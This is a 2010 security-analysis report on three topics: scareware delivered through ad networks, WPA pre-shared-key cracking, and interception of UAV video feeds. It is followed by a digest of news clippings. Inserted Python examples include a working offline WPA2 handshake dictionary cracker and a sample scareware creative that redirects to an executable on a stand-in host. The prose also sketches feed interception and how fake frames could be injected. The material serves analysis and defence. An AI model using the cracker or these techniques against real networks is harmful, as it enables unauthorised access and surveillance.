About Entity X
Electronic warfare was formerly an issue for the military on the battlefield,
but now it affects every aspect of our lives, our work and our government.
At Entity X Inc we have recognized the growing significance of cyber threats
and net‑centric warfare. We’re a team of highly experienced IT professionals
working at the cutting edge of technology. Unlike conventional IT security firms
we seek to develop in our clients a greater and deeper understanding of the
range of disparate yet rapidly evolving threats that governments, businesses and
individuals face. Entity X Inc produces the Daedalus report series to inform and
brief our clients and we also provide consultancy and training in this specialized
but increasingly significant field.
Contact
info@entity-x.com
Contributors
Robi Sen, Analysis Director, Entity X
Ian Starnes, Senior Analyst, Entity X
Shane Frasier, Senior Analyst, Entity X
All material © Entity X Inc, 2010. All rights reserved. Not for further distribution.
Summary
• Awareness and up-to-date antivirus tools will protect users against the current form of the attack
• However, the vector is novel and with greater sophistication it could
pose real challenges
• The potential for this vector to target specific users through social engineering is
the most significant implication and raises broad concerns
• Security professionals and policy makers should consider these potentialities
• These vectors have implications for how advertising space is sold and bought on
websites, given that the buyer can host adverts on their own server
Scareware and scamware groups have recently adopted a number of new attack vectors that
have important ramifications for security professionals. Both attack trends make novel
use of established and trusted commercial companies to disseminate or manage attacks and to
provide command and control support. This creates scenarios which could inspire more
sophisticated malware distributors or hostile actors to use the same techniques to rapidly
disseminate malware through these normally trusted channels. Such trends need to be
carefully monitored because of their great potential for cyber warfare, cyber espionage, and
information operations.
The advert advises the user to download and install an antivirus application, which is in fact
malware. If successfully duped, the user’s computer is infected with real malware and the user
is then pestered by the scareware group into paying for its removal. Many, but not all, antivirus
tools will warn of an ‘HTTP fake website attack’, but once the malware is installed it can be very
difficult to remove. Moreover, this particular attack will not be the last to use advertising
platforms to disseminate malware.
Threat Overview
This method of attack, in which a group posing as a legitimate company buys advertising,
was quickly adopted by scareware distributors and similar attacks soon appeared on numerous
other websites. The attack, which is really a form of social engineering, exploits the fact that
advertising clients are able to host the advert on their own servers: the scareware distributors,
posing as legitimate clients, get a benign advert approved and then swap it on their server for one
that attempts to scare the user into downloading malware.
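The swap works because the network approves a URL rather than the bytes that URL serves. As an added example that is not part of the original report, nor code from any advertising platform, the following Python shows the check an ad-operations team could run: pin the approved creative by content hash, re-fetch it from the buyer’s server after approval, and flag any drift together with the scareware markers such drift typically introduces. The ApprovedCreative record, the SUSPICIOUS patterns and both HTML creatives are constructed for the example.

```python
import hashlib
import re
from dataclasses import dataclass
from typing import List, Tuple

# Added example: an assumed data model for an ad network that lets buyers host
# their own creative.  Not the code of any real ad platform.


@dataclass(frozen=True)
class ApprovedCreative:
    advertiser: str
    url: str          # buyer-hosted URL that was reviewed
    sha256: str       # digest of the creative bytes at review time


# Markers typical of a scareware landing page; patterns are illustrative only.
SUSPICIOUS = (
    (re.compile(rb"your (computer|pc) (is|may be) infected", re.I), "scareware lure text"),
    (re.compile(rb"\.(exe|msi|scr)(['\"?#\s]|$)", re.I), "link to a Windows executable"),
    (re.compile(rb"window\.location|http-equiv=['\"]refresh", re.I), "forced redirect"),
)


def approve(advertiser: str, url: str, creative: bytes) -> ApprovedCreative:
    """Record what the reviewer actually saw, by content hash rather than by URL."""
    return ApprovedCreative(advertiser, url, hashlib.sha256(creative).hexdigest())


def verify_served(approved: ApprovedCreative, served: bytes) -> Tuple[bool, List[str]]:
    """Re-check a creative fetched from the buyer's server after approval.

    Returns (ok, findings).  A changed hash alone is a finding: the buyer may
    have swapped the advert, which is exactly the trick described above.
    The pattern scan then explains why the change matters.
    """
    findings = []
    if hashlib.sha256(served).hexdigest() != approved.sha256:
        findings.append("creative differs from the approved version")
    for pattern, label in SUSPICIOUS:
        if pattern.search(served):
            findings.append(label)
    return (not findings, findings)


# Constructed sample creatives (not real adverts).
APPROVED_HTML = (b'<a href="https://shop.example/sale"><img src="https://ads.example/sale.png" '
                 b'alt="Spring sale"></a>')
SWAPPED_HTML = (b'<div class="alert">Warning! Your computer is infected.</div>'
                b'<a href="http://scan.example/setup.exe">Download free antivirus now</a>'
                b'<script>window.location="http://scan.example/setup.exe"</script>')


def demo():
    """Approve the benign creative, then re-check both the unchanged and the swapped copy."""
    record = approve("Example Shop Inc", "https://cdn.buyer.example/ad.html", APPROVED_HTML)
    return verify_served(record, APPROVED_HTML), verify_served(record, SWAPPED_HTML)


if __name__ == "__main__":
    unchanged, swapped = demo()
    print("unchanged:", unchanged)
    print("swapped:  ", swapped)
```

Hashing the served bytes is the detective control; the preventive one is not to let the buyer host the creative at all and to serve the reviewed copy from the network’s own servers, which removes the swap window entirely.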
These sorts of scareware scams are an enormous problem and one of the worst offenders is the
‘Koobface’ gang, also known as ‘Ali Baba and the 40 Thieves LLC’ – see Figure 1. Koobface
specializes in using trusted commercial entities such as Facebook, Twitter, and Myspace to
spread its malware and to host command and control for its Koobface botnets. Furthermore,
the Koobface gang was behind a significant black hat search engine optimization scheme
focused on Google that attempted to game popular search terms, such as ‘9/11’, so that its web
pages and links were ranked at the top of the search results. When a user clicked on such
a link, Koobface attempted scareware attacks similar to those outlined above or attempted to push
malware directly on to the user’s computer.
While most of these attacks are relatively simplistic, easy to detect, generally target only
Windows computers, and often require a large amount of user interaction and social engineering
to succeed, there is nothing stopping attackers from pushing more sophisticated or direct attacks
on the user. This is where the real concern lies.
While such an attack is easy to detect with normal antivirus tools and is essentially a social
engineering attack, a more sophisticated organization could use this same vector as a low-
cost, efficient method for the targeted dissemination of malware. An organization with hostile
intentions could simply create a shell company, or pretend to be a legitimate company, to
buy advertising space in a targeted community. For example, an Iranian organization could
buy advertising space in the Los Angeles Times or a newspaper in a community with a large
population of dissident Iranians. It could then use much more sophisticated exploits that are
harder for antivirus software to detect, or offer items like free ‘Iranian MP3s’ or ‘movies’
that also contain malware able to install backdoors on some of the targeted users’ systems.
Implications
Security professionals: Consider raising awareness of such tactics to your staff and
review processes which allow advertising buyers to host their own adverts.
Policy makers: Consider social engineering vector and its policy implications.
Intelligence professionals: Consider black hat/white hat potential of such activity.
Summary
• Raises awareness of the insecurity of WPA and WPA2 networks protected by a guessable
pre-shared key
• Potential for the use of such platforms for unprecedented large-scale exploitation of
wireless systems, encryption keys, and security systems
Indeed, many network administrators rely on the time-consuming process of brute-forcing a WPA
pre-shared key from a captured handshake to deter wardrivers or other less committed attackers.
What is worse is that some network administrators hold the mistaken belief that WPA is secure
from any form of key-recovery attack short of a supercomputer, something they often incorrectly
assume no hacker has access to. As such, the Web Cracker service offers the potential to greatly
increase the ease of exploitation of wireless networks for malicious users and potentially
exposes all information and systems that use such networks.
Threat Overview
Web Cracker (and cheap home-built supercomputers) also increases the likelihood of large-
scale exploitation of wireless systems because individuals could easily survey an area with a
laptop or other device equipped with an 802.11 radio (potentially any smart phone) and capture
the WPA four-way handshakes of every network in range; the handshake is all that an offline
attack on the passphrase needs. These captures could then be uploaded to a WPA cracking
cluster like Web Cracker or a purpose-built mini supercomputer for later mass exploitation. A
highly resourceful malcontent could even seed an area, such as an office, with a number of
wireless devices that send back the captured handshakes over some other transport. Once the
passphrases are recovered and delivered back to the devices, they could unobtrusively act as
Wi-Fi bugs, collecting all information passing over the access points in the building and
redirecting it.
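To make concrete what a passive listener actually collects, and why a service such as Web Cracker can work on a capture long after the fact, the following Python is an added example (not the report’s, and not the Web Cracker service’s own code). A listener records the four-way handshake: both MAC addresses, both nonces, and one EAPOL frame with its MIC. Each candidate passphrase is then turned into a PMK with PBKDF2-HMAC-SHA1 (4096 rounds, salted with the SSID), expanded with the 802.11i PRF into the key-confirmation key, and checked against the recorded MIC. No further contact with the network is needed. The SSID, passphrase, MAC addresses, nonces, EAPOL bytes and wordlist are all constructed; capture_handshake stands in for a sniffer by building the same fields from a known passphrase.

```python
import hashlib
import hmac
from typing import Optional

# Added example, not code from the Web Cracker service.  All values below
# (SSID, passphrase, MAC addresses, nonces, EAPOL bytes) are constructed.


def pmk_from_passphrase(passphrase: bytes, ssid: bytes) -> bytes:
    """WPA/WPA2-PSK master key: PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The 4096 rounds are the only cost per guess; a cluster simply runs guesses
    in parallel, and a table can be precomputed for each common SSID."""
    return hashlib.pbkdf2_hmac("sha1", passphrase, ssid, 4096, 32)


def kck_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """IEEE 802.11i PRF-512 over the public handshake values.  The full PTK is
    64 bytes; its first 16 bytes (the KCK) are enough to verify the handshake MIC."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    ptk = b"".join(
        hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
        for i in range(4))
    return ptk[:16]


def eapol_mic(kck: bytes, eapol_mic_zeroed: bytes) -> bytes:
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the EAPOL frame with the
    MIC field zeroed, truncated to 16 bytes."""
    return hmac.new(kck, eapol_mic_zeroed, hashlib.sha1).digest()[:16]


def capture_handshake(passphrase: bytes, ssid: bytes) -> dict:
    """Stand-in for a sniffer: produce the public fields of a four-way handshake
    that a passive listener (or a planted Wi-Fi bug) can record."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    # Constructed message-2 EAPOL-Key frame with the MIC field zeroed.
    eapol = b"\x01\x03\x00\x75\x02\x01\x0a" + b"\x00" * 8 + snonce + b"\x00" * 50
    kck = kck_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)
    return {"ssid": ssid, "ap": ap_mac, "sta": sta_mac, "anonce": anonce,
            "snonce": snonce, "eapol": eapol, "mic": eapol_mic(kck, eapol)}


def crack(hs: dict, wordlist) -> Optional[bytes]:
    """Offline dictionary attack: every candidate is tested against the recorded
    MIC, with no further traffic to the target network."""
    for candidate in wordlist:
        kck = kck_from_pmk(pmk_from_passphrase(candidate, hs["ssid"]),
                           hs["ap"], hs["sta"], hs["anonce"], hs["snonce"])
        if hmac.compare_digest(eapol_mic(kck, hs["eapol"]), hs["mic"]):
            return candidate
    return None


WORDLIST = [b"password", b"letmein", b"office2010", b"correct horse", b"hunter2"]

if __name__ == "__main__":
    hs = capture_handshake(b"correct horse", b"office-wlan")
    print("recovered:", crack(hs, WORDLIST))                # b'correct horse'
    hs = capture_handshake(b"9v!Qz#4pLw@7rT&e", b"office-wlan")
    print("recovered:", crack(hs, WORDLIST))                # None: not in the list
```

The PBKDF2 rounds are the entire per-guess cost, so the attack scales with the wordlist and the hardware, not with anything the network does after the handshake has been captured. The second run in the block shows the technical countermeasure: a long random passphrase is beyond any dictionary, and 802.1X (WPA2-Enterprise) removes the shared passphrase altogether.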
For a few thousand dollars a sophisticated attacker could emplace such wireless bugs at key
access points and then, by combining them with something like Shodan (see the Entity X Daedalus
Special Report on the SHODAN search engine), create a system to discover, enumerate, and
automate the large-scale exploitation of numerous targeted systems in near real time. For
example, a hacker could emplace Wi-Fi bugs around an office park and crack the WPA passphrases
of its Wi-Fi access points. From there they could have a tool sniff for the HTTP headers coming
out of poorly secured or configured devices such as web cameras and potentially, in near real
time, discover when a user opens their laptop and sets up a video over IP chat, and watch it as it
happens. Of course, all the methods described here could also be used by law enforcement or
security services.
While the Web Cracker service is potentially a great boon for IT security specialists
to demonstrate the insecurity of wireless protocols, it offers even more opportunities to
malicious users. While Entity-X in no way suggests that this is the intent of the Web
Cracker service, we believe that it demonstrates a clear trend in the increasing availability
and low cost of high-performance computing being used to crack security systems. We
therefore recommend that our readers reconsider their security policies, reduce or remove
the use of Wi-Fi systems, and use virtual private networks (VPNs) over their Wi-Fi access
points. Furthermore, all third-party Wi-Fi access points should be assumed to have been
exploited and users with sensitive information on their systems should never use Wi-Fi points
at coffee houses, hotels or other uncontrolled environments.
Implications
Security professionals: Web Cracker is a potentially useful tool for IT security
professionals to test wireless network security. Network administrators or security
officers should consider banning the use of wireless access points. Educate users to not
use Wi-Fi access points for telecommuting even if they are using a VPN.
Policy makers: Consider social engineering vector and its policy implications.
Intelligence professionals: Consider black hat/white hat potential of such activity.
Summary
• While the issue of enemies listening or watching communications is serious, there is
no indication that systems are able to be hacked or were hacked in any way
• Increased awareness is likely good for the industry which needs to realize that it must
perform security audits by third-party experts for any platform that communicates
with any other system
On December 17, 2009, The Wall Street Journal reported, inaccurately describing the tactic as
‘hacking’, on a known weakness of Predator video feeds: the lack of encryption between the drone
and the soldiers on the ground. The video feed can be intercepted by anyone with an antenna
capable of receiving the signal and hardware that can decode it. In this case, it appears the
insurgents were using a simple satellite television antenna, a laptop computer, and a software
product called SkyGrabber that decodes the video signal into formats that can be played on a
computer or copied to DVD.
It is not particularly surprising that Iraqi insurgents chose this method because in
the Middle East satellite TV is either expensive or restricted, so there are numerous
individuals with experience in finding alternative ways of accessing it, who can also provide
tools and training to those who wish to acquire similar expertise. In this case the insurgents
simply had to draw on this same expertise, already present in the region, to intercept the
line-of-sight video feeds from UAVs.
Therefore, the Wall Street Journal was not accurate in describing the tactic as ‘hacking’ since
neither the UAV nor the signal was hacked; it was intercepted in the clear. However, in
many ways this is worse because it demonstrates a complete lack of security and awareness of
oppositional capability, especially given the ease with which a signal can be intercepted.
Threat Overview
Intercepting the line-of-sight video feeds of UAVs and other military platforms is relatively
simple. First, you need an antenna to receive the signal. Typically this is a dish antenna like
those used for commercial satellite television and internet services. Secondly, you need a digital
video broadcasting (DVB, or DVB-S for satellite) PC card or USB receiver, which demodulates and
decodes the signal delivered by the dish. The DVB-S card or USB receiver is then connected to a
computer which, running software like SkyGrabber, can be used to view, edit, or process the
received signal as needed. Once the user has all the necessary components, they simply need to
know what frequency the target source is transmitting on so that they can tune in to the
available signal. Figure 2 provides an example of how an insurgent in an area where a UAV is
operating could gain access to the signal.
The laptop, DVB-S device, antenna, and software can all be purchased for a
combined cost of less than US$1,500. The components can be obtained for
even less through used electronics stores or retailers.
Once the user is able to acquire the signal, they can use software to convert it into a variety of
video formats for distribution and viewing (see Figure 3). As such, the ease of intercepting the
signal, coupled with the simplicity of distributing videos over the internet, poses serious
potential harm to the US military or other organizations using similar unencrypted line-of-sight
video transmission. Not only can opponents gain real-time tactical information but also, and
perhaps more importantly, the video can be used for information operations and propaganda
purposes.
A more concerning capability is the near real-time interception and editing of line-of-sight
video, which could be used to subtly corrupt or confuse legitimate users of the video feeds. It
is possible for an opponent to perform a man-in-the-middle attack on such signals by acting
as a proxy. The opponent, for example, could intercept the feed, relay it to a legitimate user
and then, at the right moment, inject a manufactured image. For instance, the image could show a
group of hostiles in a building setting up a portable missile launcher, and this could then
trigger preemptive firing by the legitimate user on the ‘ghost’ target. This would be an
effective method for insurgents, terrorists, and malcontents in general to wage successful
information operations and create controversy with little to no risk to themselves. At the same
time these issues create opportunities for the Department of Defense (DoD) and other
organizations to perform their own information operations.
Such a system to intercept, spoof, and relay near real-time edited video
content would generally be outside the reach of insurgents. However, it
could be achieved by talented engineering students who have access to the
necessary equipment and software, which can be procured commercially
and via open source.
Figure 3. Image showing a SkyGrabber tutorial from a forum explaining how to use the application to retrieve files
While the best method to deal with the current problem with unsecured video feeds is to
rapidly move to systems and methods that secure all communications end to end, this
is not likely to happen soon for a variety of reasons, few of which have to do with technology.
One method proposed by some at the United States Naval Institute is to inject exploits into the
video feeds being transmitted, which would allow the DoD to monitor who is intercepting
these feeds. While this is not necessarily a bad idea, it is very likely that the exploits would
soon be discovered, reverse engineered, and then used to target both DoD assets and
commercial users for nefarious purposes. Indeed, sophisticated opponents could potentially
perform man-in-the-middle attacks of their own and inject malware targeting the DoD receiving
devices, which are also potentially exploitable. This once again highlights the larger issue of
end-to-end information protection and assurance.
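The preceding paragraphs describe two consequences of an unauthenticated link: an opponent can edit or inject frames, and anything placed in the feed is as visible to the opponent as to the intended receiver. The following Python is an added example, not code from any UAV data link, of the minimum ‘end to end’ protection that defeats the injected ‘ghost’ target: each frame carries a sequence number and a MAC under a key shared by the sensor and the ground terminal, so an edited, forged or replayed frame is rejected. It assumes the key has already been provisioned on both ends, which is the genuinely hard part and is outside the scope of the illustration; unauthenticated_receive models the current link, and the frames and key are constructed.

```python
import hashlib
import hmac
from typing import Optional

# Added example, not code from any UAV data link.  Assumes a shared symmetric
# key already provisioned on the sensor and the ground terminal; key
# distribution is not shown.

TAG_LEN = 32   # HMAC-SHA256 output
SEQ_LEN = 8    # 64-bit frame sequence number


def unauthenticated_receive(frame: bytes) -> bytes:
    """Today's link as described above: whatever arrives on the frequency is
    treated as the feed, so an edited or injected frame is simply accepted."""
    return frame


class FrameSender:
    """Sensor side: number each frame and tag it under the shared key."""

    def __init__(self, key: bytes):
        self.key, self.seq = key, 0

    def send(self, payload: bytes) -> bytes:
        header = self.seq.to_bytes(SEQ_LEN, "big")
        tag = hmac.new(self.key, header + payload, hashlib.sha256).digest()
        self.seq += 1
        return header + payload + tag


class FrameReceiver:
    """Ground terminal: accept only frames that verify and have not been seen."""

    def __init__(self, key: bytes):
        self.key, self.next_seq = key, 0

    def accept(self, frame: bytes) -> Optional[bytes]:
        """Return the payload if the frame is genuine and fresh, otherwise None."""
        if len(frame) < SEQ_LEN + TAG_LEN:
            return None
        header, payload, tag = frame[:SEQ_LEN], frame[SEQ_LEN:-TAG_LEN], frame[-TAG_LEN:]
        expected = hmac.new(self.key, header + payload, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, tag):
            return None                      # forged, or edited in transit
        seq = int.from_bytes(header, "big")
        if seq < self.next_seq:
            return None                      # replay of an earlier frame
        self.next_seq = seq + 1              # gaps are tolerated: radio frames get lost
        return payload


def scenario() -> dict:
    """Honest sensor and terminal, plus an opponent relaying and editing the feed."""
    key = bytes.fromhex("00" * 31 + "01")    # constructed key for the demo
    sensor, terminal = FrameSender(key), FrameReceiver(key)
    results = {}
    genuine = sensor.send(b"frame 0: empty courtyard")
    results["genuine"] = terminal.accept(genuine)
    # Opponent edits the relayed frame to show a 'ghost' target.
    edited = genuine[:SEQ_LEN] + b"frame 0: missile launcher in courtyard" + genuine[-TAG_LEN:]
    results["edited_unauth"] = unauthenticated_receive(edited)
    results["edited_auth"] = terminal.accept(edited)
    # Opponent without the key builds a whole frame of their own.
    results["forged_auth"] = terminal.accept(FrameSender(b"guess" * 6).send(b"ghost target"))
    # Opponent replays an earlier genuine frame.
    results["replay_auth"] = terminal.accept(genuine)
    return results


if __name__ == "__main__":
    for name, value in scenario().items():
        print(f"{name:14s} -> {value!r}")
```

A MAC gives integrity and origin only; anyone with a dish can still watch the feed, which is the interception problem in the first half of this section. Confidentiality needs encryption as well, in practice an authenticated-encryption mode such as AES-GCM keyed the same way, with the sequence number doubling as the nonce. The sequence check deliberately tolerates gaps, because frames are lost over a radio link, but it never accepts a number it has already passed.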
Regardless, the security issues that have come to the fore regarding unsecured line-of-sight
video communications pose serious problems for active forces, and could lead to the much greater
problem of general corruption and manipulation of US information systems by sophisticated state
actors.
Implications
Security professionals: Relying on obscurity versus a robust security chain is a
poor choice. Consider mechanisms beyond just standard encryption to certify the
trustworthiness of information in an enterprise. Educate stakeholders on the risks of
not doing security testing.
Policy makers: Publicly funded information systems need to be audited by
professional third-party security experts.
Intelligence professionals: Consider risks of relying on unencrypted sensor
platforms. Realize that even ‘secure’ video and audio systems can be monitored
and corrupted. Realize the opportunity in video and voice over IP monitoring and
spoofing.
Cyber spies can be anyone, anywhere and may have any motive
The Vancouver Sun (British Columbia), November 7, 2009, Saturday Final Edition. BYLINE: Wesley Wark,
Special to the Sun. SECTION: ISSUES & IDEAS; Pg. C4. LENGTH: 904 words.
Not long after an
Italian inventor, Guglielmo Marconi, proved that messages could be sent through the air
over long distances by radio, modern espionage went airborne. The First World War was
just around the corner. Spy services were tasked to hunt out not just enemy agents but the
radio whispers of friends and foes, in a new form of intelligence gathering called SIGINT
(signals intelligence).
Date : 09/02/2010 ( Source : THE VANCOUVER SUN )
CAUGHT IN $9 MILLION FRAUD Major Credit Card Processor Victimized in Elaborate Theft
of Account Numbers WASHINGTON - Sergei Tsurikov, 25, of Tallinn, Estonia; Viktor Pleshchuk,
28, of St. Petersburg, Russia; Oleg Covelin, 28, of Chisinau, Moldova; and a person known only
as “Hacker 3;” have been indicted by a federal grand jury in Atlanta, Ga., on charges of hacking
into a computer network operated by the Atlanta-based credit card processing company RBS
WorldPay, which is part of the Royal Bank of Scotland, announced Assistant Attorney General of
the Criminal Division Lanny A. Breuer; Acting U.S. Attorney Sally Quillian Yates of the Northern
District of Georgia; and Special Agent-in-Charge Greg Jones of the Atlanta Field Office of the FBI.
Date : 09/02/2010 ( Source : Justice Department Documents and Publications )
Knockout Punch
Defense Technology International, December 1, 2009. BYLINE: David A. Fulghum. SECTION: Non-Kinetic
Warfare; Pg. 38, Vol. 3 No. 11. LENGTH: 1463 words.
Washington. The U.S. is moving rapidly in the development of next-generation
weapons for cyber-combat, electronic attack, network invasion, information operations and other
non-kinetic warfare. But so are others. Potential enemies and non-state foes are employing digital
weapons, while allied defenses against them lag. Organized crime, cyber-thieves, industrial spies
and specially trained military operators are creating network breaches faster than they can be
repaired.
Date : 09/02/2010 ( Source : Defense Technology International )
Microsoft COFEE, Some of the Most Illegal Software You Can Pirate
[Hacking]
Gizmodo, November 7, 2009, Saturday 2:00 PM EST. LENGTH: 118 words. (Gawker Media delivered by Newstex)
Apparently Microsoft’s (NASDAQ:MSFT) COFEE software that helps
law enforcement grab data from password protected or encrypted sources is leaking all over the
internet. So not only can you steal the software, but break the law by using it too. Yep, it’s all out
there on the internet, but if you use it to grab private data from someone else’s computer chances
are you’re in for a world of legal hurt.
Date : 09/02/2010 ( Source : Gizmodo )
company. The report’s findings come less than a month after the United States ran a nationwide
campaign to raise awareness of cybercrime risks among individuals and businesses. “Is the age of
cyberwar at hand?” McAfee asked in the report, citing evidence that countries hostile to industrial
democracies are involved in some of the more serious and sustained cybercrime.
Date : 09/02/2010 ( Source : UPI )
Justice’s Federal Bureau of Investigation Boston Field Office issued the following press release:
Charges were unsealed in federal court against an Oregon man and the company he founded,
TCNISO, alleging that they developed and distributed products that allowed users to modify
their cable modems and obtain internet access without paying for it.
Date : 09/02/2010 ( Source : US FED NEWS )
UAV hacking
Marine Corps Times, December 28, 2009, Monday. SECTION: SIT REP; Pg. 3. LENGTH: 427 words.
Iraqi insurgents have been capturing the nonsecure, line-of-sight communications signals
from unmanned aerial vehicles such as the MQ-1 Predator
and MQ-9 Reaper since mid-2008, Defense officials have confirmed. Some military leaders
have downplayed the risks, but others say it’s giving insurgents an edge. As far back as 1996,
the military has known that outsiders can see these video feeds, which have been vital to
Marines and other ground troops in Iraq and Afghanistan.
Date : 09/02/2010 ( Source : MARINE CORPS TIMES )
the latest Apple software from AT&T’s wireless network, Apple is looking for a sheriff to
lock the smartphones back up again, permanently. Motorola Droid vs. Apple iPhone 3GS:
finally, a contender? A job posting on Apple corporate Web site seeks a security manager
for the iPhone platform to lead a team focused on secure booting and installation of the
operating system, cryptographic services, partitioning and hardening its internal security
domains, and risk analysis of security threats.
Date : 09/02/2010 ( Source : NETWORK WORLD )
to complexity of systems and human fallibility; calls for rigorous testing under simulated
real-life and extreme loads to ensure intranet remains fast and efficient under all loads
and circumstances; regards endpoint and perimeter security as weakest links, and
subtle manipulation of data and people as greatest threat.
LOAD-DATE: December 23, 2009. DOCUMENT-TYPE: Editorial column (abstract). Copyright 2009
The New York Times Company, Information Bank Abstracts.
Date : 09/02/2010 ( Source : JANE’S DEFENCE WEEKLY )
to try and hack into our networks, and we are aware of our enemies’ capabilities.” On
Tuesday, head of Military Intelligence Maj-Gen Amos Yadlin warned of the growing cyber
warfare threat against Israel and around the world.
Date : 09/02/2010 ( Source : BBC MONITORING MIDDLE EAST - POLITICAL )